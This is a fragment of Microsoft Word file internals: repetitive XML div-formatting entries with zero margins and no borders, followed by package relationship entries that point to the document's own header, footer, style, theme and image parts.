                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="175463883">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1424913146">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2023123399">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="526455939">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1792623431">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="165902178">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="117800348">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1816331479">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1014915870">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="218170280">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1403602736">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="513231839">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="911088293">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1002440484">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="50007110">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1868979395">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1251042542">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="7072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9735">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1992248698">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1584026090">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="754790189">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1500384323">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1749380098">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1079060079">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="154609606">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1928269062">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="406656394">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1530217208">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="927008494">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1337461877">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2106530158">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="463275360">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1278025053">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="439299328">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1902715652">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1359156961">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1075516602">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="7451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576">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2079086588">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1955987826">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="809903865">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="693961180">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1373771037">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2363816">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1760787711">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1710646751">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1316228842">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="973750053">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="240139069">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="626736923">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="229467874">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="590703235">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1453472630">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="912929216">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="995186853">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1196386469">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="380984013">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2133818216">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="16180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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xm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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId6" 